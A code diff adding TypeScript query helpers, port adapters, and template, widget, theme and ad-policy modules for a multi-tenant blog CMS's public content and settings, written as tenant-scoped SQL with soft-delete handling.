+/** Category/tag lookup for an archive page — 404 if the term doesn't exist or is soft-deleted, same as any other public "not found" case. */
+export async function fetchPublicTermBySlug(
+  tx: Bun.SQL,
+  tenantId: string,
+  taxonomyType: string,
+  slug: string
+): Promise<PublicTermSummary | null> {
+  const rows = (await tx`
+    SELECT id, taxonomy_type, name, slug, description
+    FROM awcms_blog_terms
+    WHERE tenant_id = ${tenantId} AND taxonomy_type = ${taxonomyType}
+      AND slug = ${slug} AND deleted_at IS NULL
+  `) as {
+    id: string;
+    taxonomy_type: string;
+    name: string;
+    slug: string;
+    description: string | null;
+  }[];
+
+  const row = rows[0];
+  if (!row) {
+    return null;
+  }
+
+  return {
+    id: row.id,
+    taxonomyType: row.taxonomy_type,
+    name: row.name,
+    slug: row.slug,
+    description: row.description
+  };
+}
+
+export type PublicPostTaxonomyTerm = {
+  taxonomyType: string;
+  name: string;
+  slug: string;
+};
+
+/**
+ * Category/tag names assigned to a public post (Issue #649 — `article:
+ * section`/`article:tag` Open Graph meta and JSON-LD `NewsArticle`
+ * `articleSection`/`keywords`). Tenant-scoped join against
+ * `awcms_blog_post_terms`, excludes soft-deleted terms (same
+ * `deleted_at IS NULL` convention as `fetchPublicTermBySlug`) — a term an
+ * editor later archived should stop appearing in newly-rendered share
+ * previews without needing a post edit. Ordered by taxonomy type then name
+ * so category-typed terms are deterministically first (the caller picks the
+ * first `taxonomyType === "category"` entry as `article:section`, and the
+ * remainder — including tags — as `article:tag`).
+ */
+export async function fetchPublicPostTaxonomyTerms(
+  tx: Bun.SQL,
+  tenantId: string,
+  postId: string
+): Promise<PublicPostTaxonomyTerm[]> {
+  const rows = (await tx`
+    SELECT t.taxonomy_type, t.name, t.slug
+    FROM awcms_blog_post_terms pt
+    JOIN awcms_blog_terms t
+      ON t.id = pt.term_id AND t.tenant_id = pt.tenant_id
+    WHERE pt.tenant_id = ${tenantId} AND pt.post_id = ${postId}
+      AND t.deleted_at IS NULL
+    ORDER BY t.taxonomy_type ASC, t.name ASC
+  `) as { taxonomy_type: string; name: string; slug: string }[];
+
+  return rows.map((row) => ({
+    taxonomyType: row.taxonomy_type,
+    name: row.name,
+    slug: row.slug
+  }));
+}
+
+export async function listPublicBlogPostsByTermId(
+  tx: Bun.SQL,
+  tenantId: string,
+  termId: string,
+  options: { page?: number; pageSize?: number } = {}
+): Promise<PublicBlogPostPage> {
+  const pageSize = boundedPageSize(options.pageSize);
+  const page = boundedPage(options.page);
+  const offset = (page - 1) * pageSize;
+
+  const rows = (await tx`
+    SELECT p.id, p.title, p.slug, p.excerpt, p.published_at, p.featured_media_id
+    FROM awcms_blog_posts p
+    JOIN awcms_blog_post_terms pt
+      ON pt.post_id = p.id AND pt.tenant_id = p.tenant_id
+    WHERE p.tenant_id = ${tenantId} AND pt.term_id = ${termId}
+      AND p.status = 'published' AND p.visibility = 'public'
+      AND p.deleted_at IS NULL AND p.published_at IS NOT NULL AND p.published_at <= now()
+    ORDER BY p.published_at DESC
+    LIMIT ${pageSize + 1} OFFSET ${offset}
+  `) as PublicBlogPostSummaryRow[];
+
+  const hasNextPage = rows.length > pageSize;
+
+  return {
+    items: rows.slice(0, pageSize).map(toSummary),
+    hasNextPage
+  };
+}
+
+/**
+ * Fetches public/published summaries for a curated set of post ids (Issue
+ * #637 — `headline`/`featured_posts`/`editor_picks` homepage sections),
+ * preserving the CALLER's requested order (not `published_at DESC`) since
+ * curation order is editorially meaningful here, unlike the chronological
+ * listing functions above. A stale/unpublished/cross-tenant/soft-deleted
+ * id is silently dropped from the result rather than throwing — same
+ * "degrade, don't 500" convention `resolveVerifiedNewsMediaReferences`
+ * uses for media references.
+ */
+export async function fetchPublicBlogPostSummariesByIds(
+  tx: Bun.SQL,
+  tenantId: string,
+  postIds: readonly string[]
+): Promise<PublicBlogPostSummary[]> {
+  if (postIds.length === 0) {
+    return [];
+  }
+
+  const rows = (await tx`
+    SELECT id, title, slug, excerpt, published_at, featured_media_id
+    FROM awcms_blog_posts
+    WHERE tenant_id = ${tenantId} AND id = ANY(${tx.array([...new Set(postIds)], "uuid")})
+      AND status = 'published' AND visibility = 'public'
+      AND deleted_at IS NULL AND published_at IS NOT NULL AND published_at <= now()
+  `) as PublicBlogPostSummaryRow[];
+
+  const byId = new Map(rows.map((row) => [row.id, toSummary(row)]));
+
+  return postIds
+    .map((id) => byId.get(id))
+    .filter(
+      (summary): summary is PublicBlogPostSummary => summary !== undefined
+    );
+}
+
+const FEED_ITEM_LIMIT = 50;
+
+/** RSS/sitemap source — flat, unpaginated (feeds/sitemaps are consumed by machines, not paged by a visitor), bounded to the latest 50 published public posts. */
+export async function listPublicBlogPostsForFeed(
+  tx: Bun.SQL,
+  tenantId: string
+): Promise<PublicBlogPostDetail[]> {
+  const rows = (await tx`
+    SELECT id, title, slug, excerpt, content_json, content_text, seo_title,
+      meta_description, canonical_url, locale, published_at, updated_at,
+      visibility, featured_media_id, seo_image_media_id
+    FROM awcms_blog_posts
+    WHERE tenant_id = ${tenantId}
+      AND status = 'published' AND visibility = 'public'
+      AND deleted_at IS NULL
+      AND published_at IS NOT NULL AND published_at <= now()
+    ORDER BY published_at DESC
+    LIMIT ${FEED_ITEM_LIMIT}
+  `) as PublicBlogPostDetailRow[];
+
+  return rows.map(toDetail);
+}
+
+export type PublicBlogSettings = {
+  postsPerPage: number;
+  seoDefaultTitle: string | null;
+  seoDefaultDescription: string | null;
+};
+
+const DEFAULT_POSTS_PER_PAGE = 10;
+
+/** Reads `awcms_blog_settings` (Issue #537), falling back to schema defaults when the tenant has never configured a row — same "missing row = default" convention `resolveModuleEnabled` uses for `awcms_tenant_modules`. */
+export async function fetchPublicBlogSettings(
+  tx: Bun.SQL,
+  tenantId: string
+): Promise<PublicBlogSettings> {
+  const rows = (await tx`
+    SELECT posts_per_page, seo_default_title, seo_default_description
+    FROM awcms_blog_settings
+    WHERE tenant_id = ${tenantId}
+  `) as {
+    posts_per_page: number;
+    seo_default_title: string | null;
+    seo_default_description: string | null;
+  }[];
+
+  const row = rows[0];
+
+  return {
+    postsPerPage: row?.posts_per_page ?? DEFAULT_POSTS_PER_PAGE,
+    seoDefaultTitle: row?.seo_default_title ?? null,
+    seoDefaultDescription: row?.seo_default_description ?? null
+  };
+}

--- a/src/modules/blog-content/application/public-content-port-adapter.ts
+++ b/src/modules/blog-content/application/public-content-port-adapter.ts
@@ -1,0 +1,113 @@
+/**
+ * Concrete `PublicContentPort` implementation (Issue #681, epic #679
+ * platform-hardening) — `blog_content`'s own capability, wired into
+ * `news_portal`'s homepage-section composer/reference-validation at the
+ * composition root (route handlers), never imported by `news_portal`'s
+ * `application`/`domain` files directly. See
+ * `_shared/ports/public-content-port.ts` for the full "why a port"
+ * reasoning.
+ *
+ * `postExists` uses the ADMIN-facing `fetchBlogPostById` (not a public-
+ * visibility-filtered query) deliberately — Issue #637's write-time
+ * reference validation only needs to confirm a curated `postId` exists
+ * for this tenant (an editor may curate a not-yet-published post), while
+ * `fetchPostSummariesByIds`/`listPosts`/`listPostsByCategoryId` (used at
+ * RENDER time) correctly stay public-visibility-filtered
+ * (`fetchPublicBlogPostSummariesByIds`/`listPublicBlogPosts`/
+ * `listPublicBlogPostsByTermId`) — the same existence-vs-visibility split
+ * `homepage-section-reference-validation.ts` already relied on before
+ * this extraction.
+ */
+import { fetchBlogPostById } from "./blog-post-directory";
+import {
+  fetchPublicBlogPostSummariesByIds,
+  fetchPublicTermBySlug,
+  listPublicBlogPosts,
+  listPublicBlogPostsByTermId
+} from "./public-blog-directory";
+import type {
+  PublicContentCategoryDTO,
+  PublicContentPort,
+  PublicContentPostPageDTO,
+  PublicContentPostSummaryDTO
+} from "../../_shared/ports/public-content-port";
+
+export const publicContentPortAdapter: PublicContentPort = {
+  async postExists(
+    tx: Bun.SQL,
+    tenantId: string,
+    postId: string
+  ): Promise<boolean> {
+    const post = await fetchBlogPostById(tx, tenantId, postId);
+    return post !== null;
+  },
+
+  async fetchPostSummariesByIds(
+    tx: Bun.SQL,
+    tenantId: string,
+    postIds: readonly string[]
+  ): Promise<PublicContentPostSummaryDTO[]> {
+    const posts = await fetchPublicBlogPostSummariesByIds(
+      tx,
+      tenantId,
+      postIds
+    );
+    return posts.map((post) => ({
+      id: post.id,
+      title: post.title,
+      slug: post.slug,
+      excerpt: post.excerpt,
+      featuredMediaId: post.featuredMediaId
+    }));
+  },
+
+  async fetchCategoryBySlug(
+    tx: Bun.SQL,
+    tenantId: string,
+    slug: string
+  ): Promise<PublicContentCategoryDTO | null> {
+    const term = await fetchPublicTermBySlug(tx, tenantId, "category", slug);
+    return term ? { id: term.id, name: term.name, slug: term.slug } : null;
+  },
+
+  async listPosts(
+    tx: Bun.SQL,
+    tenantId: string,
+    options: { pageSize?: number }
+  ): Promise<PublicContentPostPageDTO> {
+    const page = await listPublicBlogPosts(tx, tenantId, {
+      pageSize: options.pageSize
+    });
+    return {
+      items: page.items.map((post) => ({
+        id: post.id,
+        title: post.title,
+        slug: post.slug,
+        excerpt: post.excerpt,
+        featuredMediaId: post.featuredMediaId
+      })),
+      hasNextPage: page.hasNextPage
+    };
+  },
+
+  async listPostsByCategoryId(
+    tx: Bun.SQL,
+    tenantId: string,
+    categoryId: string,
+    options: { pageSize?: number }
+  ): Promise<PublicContentPostPageDTO> {
+    const page = await listPublicBlogPostsByTermId(tx, tenantId, categoryId, {
+      pageSize: options.pageSize
+    });
+    return {
+      items: page.items.map((post) => ({
+        id: post.id,
+        title: post.title,
+        slug: post.slug,
+        excerpt: post.excerpt,
+        featuredMediaId: post.featuredMediaId
+      })),
+      hasNextPage: page.hasNextPage
+    };
+  }
+};

--- a/src/modules/blog-content/application/public-route-settings.ts
+++ b/src/modules/blog-content/application/public-route-settings.ts
@@ -1,0 +1,99 @@
+/**
+ * Effective "public route" settings for `blog_content`'s public route
+ * family — legacy `/blog/{tenantCode}` (Issue #540) — ported from
+ * awcms-mini.
+ *
+ * PORT-TIME DROP: awcms-mini's equivalent file additionally served the
+ * host-resolved `/news` route family (Issue #560/#564) and carried three
+ * more settings keys for it (`publicRouteMode`/`publicBasePath`/
+ * `publicLabel`). That route family needs `lib/tenant/public-host-tenant-
+ * resolver.ts` (custom-domain-based tenant resolution, part of the
+ * `tenant_domain` routing module) which is not ported to this base yet — see
+ * `blog-content/module.ts`'s own `description` field for the full
+ * reasoning. Only `legacyTenantRouteEnabled` (the `/blog/{tenantCode}`
+ * on/off switch) is kept here; it needs nothing from `tenant_domain`.
+ *
+ * Deliberately reads from TWO existing, already-authoritative stores
+ * instead of inventing a third:
+ *
+ * 1. `blog_content`'s module descriptor `settings.defaults` (`module.ts`) +
+ *    the tenant's `awcms_module_settings` override, via Module Management's
+ *    generic tenant-settings framework (`fetchModuleSettingsView`). Owns
+ *    `legacyTenantRouteEnabled`.
+ * 2. `awcms_blog_settings` (migration 035, wired up by
+ *    `blog-settings-directory.ts`'s `fetchBlogSettings`). Owns
+ *    `rssEnabled`/`sitemapEnabled` — NOT duplicated into store (1): two
+ *    independent, writable stores for the identical concept would be a real
+ *    single-source-of-truth bug — an admin could flip "RSS enabled" off in
+ *    the generic `/admin/modules/blog_content` settings panel while
+ *    `/blog/{tenantCode}/feed.xml.ts` keeps reading the OLD
+ *    `awcms_blog_settings` value and stays enabled.
+ *
+ * `fetchEffectivePublicRouteSettings` merges READ access to both into one
+ * DTO so `/blog/{tenantCode}` route handlers don't need to call two
+ * functions and remember which field lives where — it does not create a
+ * third writable store. Every field's write path is still whichever of the
+ * two stores above already owns it: `PATCH /api/v1/tenant/modules/blog_content/settings`
+ * for the first, `PATCH /api/v1/blog/settings` for the last two.
+ */
+import { fetchBlogSettings } from "./blog-settings-directory";
+import { fetchModuleSettingsView } from "../../module-management/application/module-settings";
+
+const BLOG_CONTENT_MODULE_KEY = "blog_content";
+
+export type EffectivePublicRouteSettings = {
+  legacyTenantRouteEnabled: boolean;
+  rssEnabled: boolean;
+  sitemapEnabled: boolean;
+};
+
+const DEFAULT_LEGACY_TENANT_ROUTE_ENABLED = true;
+
+/**
+ * Reads both stores and returns one merged, defensively-normalized view.
+ * `legacyTenantRouteEnabled` falls back to its safe default rather than
+ * throwing when a tenant override holds a garbage-shaped value (e.g. a
+ * non-boolean) — the generic settings framework validates only "is this a
+ * plain object with no secret-shaped key" (`validateModuleSettingsPatch`),
+ * never per-field types, so this read path is where fail-safe normalization
+ * actually happens.
+ */
+export async function fetchEffectivePublicRouteSettings(
+  tx: Bun.SQL,
+  tenantId: string
+): Promise<EffectivePublicRouteSettings> {
+  const moduleSettingsView = await fetchModuleSettingsView(
+    tx,
+    tenantId,
+    BLOG_CONTENT_MODULE_KEY
+  );
+  const blogSettings = await fetchBlogSettings(tx, tenantId);
+
+  const effective = moduleSettingsView?.effective ?? {};
+
+  return {
+    legacyTenantRouteEnabled:
+      typeof effective.legacyTenantRouteEnabled === "boolean"
+        ? effective.legacyTenantRouteEnabled
+        : DEFAULT_LEGACY_TENANT_ROUTE_ENABLED,
+    rssEnabled: blogSettings.rssEnabled,
+    sitemapEnabled: blogSettings.sitemapEnabled
+  };
+}
+
+/**
+ * Convenience wrapper for the 7 legacy `/blog/{tenantCode}/*` route files so
+ * each one makes a single call instead of re-deriving the field name. Legacy
+ * routes have no timing-parity treatment applied — the tenant code is
+ * already caller-supplied and visible in the URL path itself, so there is no
+ * "does this identifier map to a real tenant" existence question left to
+ * protect by response latency.
+ */
+export async function isLegacyTenantRouteEnabled(
+  tx: Bun.SQL,
+  tenantId: string
+): Promise<boolean> {
+  const settings = await fetchEffectivePublicRouteSettings(tx, tenantId);
+
+  return settings.legacyTenantRouteEnabled;
+}

--- a/src/modules/blog-content/application/social-publishing-port-noop-adapter.ts
+++ b/src/modules/blog-content/application/social-publishing-port-noop-adapter.ts
@@ -1,0 +1,31 @@
+/**
+ * PORT-TIME ADDITION (not present in awcms-mini) — a no-op
+ * `SocialPublishingPort` implementation, injected at every composition root
+ * (the manual `POST /api/v1/blog/posts/{id}/publish` route and the
+ * `blog:publish:scheduled` worker) instead of
+ * `social-publishing/application/social-publishing-port-adapter.ts`'s
+ * `createSocialPublishingPortAdapter(...)` factory.
+ *
+ * `social_publishing` is NOT ported to this base yet. The port's own header
+ * comment (`_shared/ports/social-publishing-port.ts`) already documents this
+ * exact fallback: "a deployment that never enables `social_publishing` ...
+ * still publishes articles exactly as before, this call simply becomes a
+ * documented no-op (`{ jobsCreated: 0 }`) rather than an error." This
+ * adapter IS that no-op, made explicit as a real value instead of an
+ * `undefined`/optional-chained call, so `onArticlePublished` never needs a
+ * conditional at its call sites.
+ *
+ * Swapping this for the real `social_publishing` adapter, once that module
+ * is ported, is a pure composition-root change — no file in this module
+ * needs to change.
+ */
+import type {
+  ArticlePublishedPortResult,
+  SocialPublishingPort
+} from "../../_shared/ports/social-publishing-port";
+
+export const noopSocialPublishingPortAdapter: SocialPublishingPort = {
+  async onArticlePublished(): Promise<ArticlePublishedPortResult> {
+    return { jobsCreated: 0 };
+  }
+};

--- a/src/modules/blog-content/application/template-directory.ts
+++ b/src/modules/blog-content/application/template-directory.ts
@@ -1,0 +1,137 @@
+import type { TemplateLayout } from "../domain/template-policy";
+import type {
+  CreateTemplateInput,
+  UpdateTemplateInput
+} from "../domain/template-policy";
+
+/** Read/write query module for `awcms_blog_templates` (Issue #542) — same "one directory, reads and writes" convention as `blog-taxonomy-directory.ts`. */
+export type BlogTemplateView = {
+  id: string;
+  tenantId: string;
+  key: string;
+  name: string;
+  layoutJson: TemplateLayout;
+  isActive: boolean;
+  createdAt: Date;
+  updatedAt: Date;
+  deletedAt: Date | null;
+  deletedBy: string | null;
+  deleteReason: string | null;
+};
+
+type BlogTemplateRow = {
+  id: string;
+  tenant_id: string;
+  key: string;
+  name: string;
+  layout_json: TemplateLayout;
+  is_active: boolean;
+  created_at: Date;
+  updated_at: Date;
+  deleted_at: Date | null;
+  deleted_by: string | null;
+  delete_reason: string | null;
+};
+
+function toView(row: BlogTemplateRow): BlogTemplateView {
+  return {
+    id: row.id,
+    tenantId: row.tenant_id,
+    key: row.key,
+    name: row.name,
+    layoutJson: row.layout_json,
+    isActive: row.is_active,
+    createdAt: row.created_at,
+    updatedAt: row.updated_at,
+    deletedAt: row.deleted_at,
+    deletedBy: row.deleted_by,
+    deleteReason: row.delete_reason
+  };
+}
+
+export async function createTemplate(
+  tx: Bun.SQL,
+  tenantId: string,
+  input: CreateTemplateInput
+): Promise<BlogTemplateView> {
+  const rows = (await tx`
+    INSERT INTO awcms_blog_templates
+      (tenant_id, key, name, layout_json, is_active)
+    VALUES (${tenantId}, ${input.key}, ${input.name}, ${input.layoutJson}, ${input.isActive})
+    RETURNING id, tenant_id, key, name, layout_json, is_active,
+      created_at, updated_at, deleted_at, deleted_by, delete_reason
+  `) as BlogTemplateRow[];
+
+  return toView(rows[0]!);
+}
+
+export async function fetchTemplateById(
+  tx: Bun.SQL,
+  tenantId: string,
+  id: string
+): Promise<BlogTemplateView | null> {
+  const rows = (await tx`
+    SELECT id, tenant_id, key, name, layout_json, is_active,
+      created_at, updated_at, deleted_at, deleted_by, delete_reason
+    FROM awcms_blog_templates
+    WHERE tenant_id = ${tenantId} AND id = ${id} AND deleted_at IS NULL
+  `) as BlogTemplateRow[];
+
+  const row = rows[0];
+  return row ? toView(row) : null;
+}
+
+/** `LIMIT 100`, name ascending — templates are low-cardinality config, same bounded-list convention as terms. */
+export async function listTemplates(
+  tx: Bun.SQL,
+  tenantId: string
+): Promise<BlogTemplateView[]> {
+  const rows = (await tx`
+    SELECT id, tenant_id, key, name, layout_json, is_active,
+      created_at, updated_at, deleted_at, deleted_by, delete_reason
+    FROM awcms_blog_templates
+    WHERE tenant_id = ${tenantId} AND deleted_at IS NULL
+    ORDER BY name ASC
+    LIMIT 100
+  `) as BlogTemplateRow[];
+
+  return rows.map(toView);
+}
+
+export async function updateTemplate(
+  tx: Bun.SQL,
+  tenantId: string,
+  id: string,
+  input: UpdateTemplateInput
+): Promise<BlogTemplateView | null> {
+  const rows = (await tx`
+    UPDATE awcms_blog_templates
+    SET name = COALESCE(${input.name ?? null}, name),
+        layout_json = COALESCE(${input.layoutJson ?? null}, layout_json),
+        is_active = COALESCE(${input.isActive ?? null}, is_active),
+        updated_at = now()
+    WHERE tenant_id = ${tenantId} AND id = ${id} AND deleted_at IS NULL
+    RETURNING id, tenant_id, key, name, layout_json, is_active,
+      created_at, updated_at, deleted_at, deleted_by, delete_reason
+  `) as BlogTemplateRow[];
+
+  return rows[0] ? toView(rows[0]) : null;
+}
+
+export async function softDeleteTemplate(
+  tx: Bun.SQL,
+  tenantId: string,
+  actorTenantUserId: string,
+  id: string,
+  reason: string
+): Promise<boolean> {
+  const rows = await tx`
+    UPDATE awcms_blog_templates
+    SET deleted_at = now(), deleted_by = ${actorTenantUserId}, delete_reason = ${reason},
+        updated_at = now()
+    WHERE tenant_id = ${tenantId} AND id = ${id} AND deleted_at IS NULL
+    RETURNING id
+  `;
+
+  return rows.length > 0;
+}

--- a/src/modules/blog-content/application/theme-settings-directory.ts
+++ b/src/modules/blog-content/application/theme-settings-directory.ts
@@ -1,0 +1,52 @@
+import type { BlogThemeMode } from "../domain/theme-policy";
+
+/**
+ * `awcms_blog_theme_settings` (Issue #542 §Theme Mode). Absence of a
+ * row means "inherit the tenant's own theme" — same "missing row = fall
+ * back to a base default" convention `fetchPublicBlogSettings` uses for
+ * `awcms_blog_settings` — so this reads `awcms_tenants.
+ * default_theme` (migration 002, the base theme engine this issue must not
+ * rebuild) as the fallback rather than hardcoding `'system'`.
+ */
+export type BlogThemeSettings = {
+  mode: BlogThemeMode;
+  isOverride: boolean;
+};
+
+export async function fetchBlogThemeSettings(
+  tx: Bun.SQL,
+  tenantId: string
+): Promise<BlogThemeSettings> {
+  const overrideRows = (await tx`
+    SELECT mode FROM awcms_blog_theme_settings WHERE tenant_id = ${tenantId}
+  `) as { mode: BlogThemeMode }[];
+
+  if (overrideRows[0]) {
+    return { mode: overrideRows[0].mode, isOverride: true };
+  }
+
+  const tenantRows = (await tx`
+    SELECT default_theme FROM awcms_tenants WHERE id = ${tenantId}
+  `) as { default_theme: BlogThemeMode }[];
+
+  return {
+    mode: tenantRows[0]?.default_theme ?? "system",
+    isOverride: false
+  };
+}
+
+/** Upsert — one row per tenant, same shape `awcms_blog_settings` uses. */
+export async function upsertBlogThemeSettings(
+  tx: Bun.SQL,
+  tenantId: string,
+  mode: BlogThemeMode
+): Promise<BlogThemeSettings> {
+  await tx`
+    INSERT INTO awcms_blog_theme_settings (tenant_id, mode)
+    VALUES (${tenantId}, ${mode})
+    ON CONFLICT (tenant_id) DO UPDATE
+    SET mode = ${mode}, updated_at = now()
+  `;
+
+  return { mode, isOverride: true };
+}

--- a/src/modules/blog-content/application/video-news-thumbnail-reference-gate.ts
+++ b/src/modules/blog-content/application/video-news-thumbnail-reference-gate.ts
@@ -1,0 +1,78 @@
+import { collectVideoNewsThumbnailReferences } from "../domain/content-block-media-references";
+import type { NewsMediaPort } from "../../_shared/ports/news-media-port";
+
+/**
+ * Sibling to `news-media-reference-gate.ts`'s
+ * `validateNewsMediaReferencesForFullOnlineR2Mode` (Issue #636) for the
+ * `video_news` block's `thumbnailMediaObjectId` (Issue #639) — deliberately
+ * kept as an entirely separate function/file rather than folding into that
+ * one, so this issue's changes never touch #636's already-reviewed gate
+ * function body (reduces merge-collision surface with any other in-flight
+ * issue also extending content-block validation).
+ *
+ * Same mode-gating convention as #636: a no-op when full-online R2-only
+ * mode is not active for the tenant. A custom thumbnail is OPTIONAL per the
+ * issue's own Rules ("Tenant policy may optionally allow provider default
+ * thumbnail") — even when the mode IS active, a `video_news` block with no
+ * `thumbnailMediaObjectId` at all is valid; only a PRESENT reference must
+ * resolve to a verified, same-tenant, non-deleted media object.
+ */
+export type VideoNewsThumbnailReferenceValidationError = {
+  field: string;
+  message: string;
+};
+
+export type VideoNewsThumbnailReferenceValidationResult =
+  | { valid: true }
+  | { valid: false; errors: VideoNewsThumbnailReferenceValidationError[] };
+
+export async function validateVideoNewsThumbnailReferencesForFullOnlineR2Mode(
+  tx: Bun.SQL,
+  tenantId: string,
+  contentJson: Record<string, unknown> | undefined,
+  mediaPort: NewsMediaPort,
+  env: NodeJS.ProcessEnv = process.env
+): Promise<VideoNewsThumbnailReferenceValidationResult> {
+  if (!contentJson) {
+    return { valid: true };
+  }
+
+  const modeActive = await mediaPort.isFullOnlineR2ModeActiveForTenant(
+    tx,
+    tenantId,
+    env
+  );
+
+  if (!modeActive) {
+    return { valid: true };
+  }
+
+  const { mediaObjectIds, violations } =
+    collectVideoNewsThumbnailReferences(contentJson);
+
+  const errors: VideoNewsThumbnailReferenceValidationError[] = [];
+
+  for (const violation of violations) {
+    errors.push({
+      field: "contentJson",
+      message: `contentJson.blocks[${violation.blockIndex}].thumbnailMediaObjectId must be a valid UUID referencing a verified R2 media object in full-online R2-only mode.`
+    });
+  }
+
+  for (const mediaObjectId of mediaObjectIds) {
+    const safe = await mediaPort.isMediaReferenceSafe(
+      tx,
+      tenantId,
+      mediaObjectId
+    );
+
+    if (!safe) {
+      errors.push({
+        field: "contentJson",
+        message: `contentJson references thumbnailMediaObjectId "${mediaObjectId}" which does not exist, does not belong to this tenant, or is not a verified R2 media object.`
+      });
+    }
+  }
+
+  return errors.length > 0 ? { valid: false, errors } : { valid: true };
+}

--- a/src/modules/blog-content/application/widget-directory.ts
+++ b/src/modules/blog-content/application/widget-directory.ts
@@ -1,0 +1,164 @@
+import type { WidgetPosition } from "../domain/widget-policy";
+import type {
+  CreateWidgetInput,
+  UpdateWidgetInput
+} from "../domain/widget-policy";
+
+/** Read/write query module for `awcms_blog_widgets` (Issue #542) — same "one directory, reads and writes" convention as `blog-taxonomy-directory.ts`. */
+export type BlogWidgetView = {
+  id: string;
+  tenantId: string;
+  position: WidgetPosition;
+  title: string;
+  bodyText: string;
+  isActive: boolean;
+  sortOrder: number;
+  createdAt: Date;
+  updatedAt: Date;
+  deletedAt: Date | null;
+  deletedBy: string | null;
+  deleteReason: string | null;
+};
+
+type BlogWidgetRow = {
+  id: string;
+  tenant_id: string;
+  position: WidgetPosition;
+  title: string;
+  body_text: string;
+  is_active: boolean;
+  sort_order: number;
+  created_at: Date;
+  updated_at: Date;
+  deleted_at: Date | null;
+  deleted_by: string | null;
+  delete_reason: string | null;
+};
+
+function toView(row: BlogWidgetRow): BlogWidgetView {
+  return {
+    id: row.id,
+    tenantId: row.tenant_id,
+    position: row.position,
+    title: row.title,
+    bodyText: row.body_text,
+    isActive: row.is_active,
+    sortOrder: row.sort_order,
+    createdAt: row.created_at,
+    updatedAt: row.updated_at,
+    deletedAt: row.deleted_at,
+    deletedBy: row.deleted_by,
+    deleteReason: row.delete_reason
+  };
+}
+
+export async function createWidget(
+  tx: Bun.SQL,
+  tenantId: string,
+  input: CreateWidgetInput
+): Promise<BlogWidgetView> {
+  const rows = (await tx`
+    INSERT INTO awcms_blog_widgets
+      (tenant_id, position, title, body_text, is_active, sort_order)
+    VALUES (
+      ${tenantId}, ${input.position}, ${input.title}, ${input.bodyText},
+      ${input.isActive}, ${input.sortOrder}
+    )
+    RETURNING id, tenant_id, position, title, body_text, is_active, sort_order,
+      created_at, updated_at, deleted_at, deleted_by, delete_reason
+  `) as BlogWidgetRow[];
+
+  return toView(rows[0]!);
+}
+
+export async function fetchWidgetById(
+  tx: Bun.SQL,
+  tenantId: string,
+  id: string
+): Promise<BlogWidgetView | null> {
+  const rows = (await tx`
+    SELECT id, tenant_id, position, title, body_text, is_active, sort_order,
+      created_at, updated_at, deleted_at, deleted_by, delete_reason
+    FROM awcms_blog_widgets
+    WHERE tenant_id = ${tenantId} AND id = ${id} AND deleted_at IS NULL
+  `) as BlogWidgetRow[];
+
+  const row = rows[0];
+  return row ? toView(row) : null;
+}
+
+export type ListWidgetsFilter = {
+  position?: WidgetPosition;
+  activeOnly?: boolean;
+};
+
+/** `?position=` optional filter; `activeOnly` used by public rendering to only ever surface `is_active = true` widgets. Sorted by `sort_order` — placement order within a position matters for rendering. */
+export async function listWidgets(
+  tx: Bun.SQL,
+  tenantId: string,
+  filter: ListWidgetsFilter = {}
+): Promise<BlogWidgetView[]> {
+  const rows = (
+    filter.activeOnly
+      ? await tx`
+        SELECT id, tenant_id, position, title, body_text, is_active, sort_order,
+          created_at, updated_at, deleted_at, deleted_by, delete_reason
+        FROM awcms_blog_widgets
+        WHERE tenant_id = ${tenantId} AND deleted_at IS NULL AND is_active = true
+          AND (${filter.position ?? null}::text IS NULL OR position = ${filter.position ?? null})
+        ORDER BY position ASC, sort_order ASC
+        LIMIT 100
+      `
+      : await tx`
+        SELECT id, tenant_id, position, title, body_text, is_active, sort_order,
+          created_at, updated_at, deleted_at, deleted_by, delete_reason
+        FROM awcms_blog_widgets
+        WHERE tenant_id = ${tenantId} AND deleted_at IS NULL
+          AND (${filter.position ?? null}::text IS NULL OR position = ${filter.position ?? null})
+        ORDER BY position ASC, sort_order ASC
+        LIMIT 100
+      `
+  ) as BlogWidgetRow[];
+
+  return rows.map(toView);
+}
+
+export async function updateWidget(
+  tx: Bun.SQL,
+  tenantId: string,
+  id: string,
+  input: UpdateWidgetInput
+): Promise<BlogWidgetView | null> {
+  const rows = (await tx`
+    UPDATE awcms_blog_widgets
+    SET position = COALESCE(${input.position ?? null}, position),
+        title = COALESCE(${input.title ?? null}, title),
+        body_text = COALESCE(${input.bodyText ?? null}, body_text),
+        is_active = COALESCE(${input.isActive ?? null}, is_active),
+        sort_order = COALESCE(${input.sortOrder ?? null}, sort_order),
+        updated_at = now()
+    WHERE tenant_id = ${tenantId} AND id = ${id} AND deleted_at IS NULL
+    RETURNING id, tenant_id, position, title, body_text, is_active, sort_order,
+      created_at, updated_at, deleted_at, deleted_by, delete_reason
+  `) as BlogWidgetRow[];
+
+  return rows[0] ? toView(rows[0]) : null;
+}
+
+export async function softDeleteWidget(
+  tx: Bun.SQL,
+  tenantId: string,
+  actorTenantUserId: string,
+  id: string,
+  reason: string
+): Promise<boolean> {
+  const rows = await tx`
+    UPDATE awcms_blog_widgets
+    SET deleted_at = now(), deleted_by = ${actorTenantUserId}, delete_reason = ${reason},
+        updated_at = now()
+    WHERE tenant_id = ${tenantId} AND id = ${id} AND deleted_at IS NULL
+    RETURNING id
+  `;
+
+  return rows.length > 0;
+}

--- a/src/modules/blog-content/domain/ad-policy.ts
+++ b/src/modules/blog-content/domain/ad-policy.ts
@@ -1,0 +1,317 @@
+import { isAbsoluteHttpUrl } from "./seo-validation";
+
+/**
+ * Ads (Issue #542 §Advertisement Management + §Security Requirements:
+ * "Unsafe scripts or embeds must not be rendered... Advertisement
+ * rendering must not become an XSS channel."). Ads carry only
+ * `imageUrl`/`linkUrl` — both validated absolute http(s) URLs, same
+ * `isAbsoluteHttpUrl` check `seo-validation.ts` uses for `canonicalUrl` —
+ * there is no raw-HTML/embed field on an ad by construction, so rendering
+ * can only ever emit `<img>`/`<a>` tags with escaped, pre-validated URLs
+ * (see `application/ads-directory.ts`'s render helper), never arbitrary
+ * markup.
+ */
+export type AdPlacementType = "global" | "widget" | "post" | "page";
+
+export const AD_PLACEMENT_TYPES: readonly AdPlacementType[] = [
+  "global",
+  "widget",
+  "post",
+  "page"
+];
+
+export function isAdPlacementType(value: unknown): value is AdPlacementType {
+  return (
+    typeof value === "string" &&
+    (AD_PLACEMENT_TYPES as string[]).includes(value)
+  );
+}
+
+export type ValidationError = {
+  field: string;
+  message: string;
+};
+
+const UUID_PATTERN =
+  /^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$/i;
+
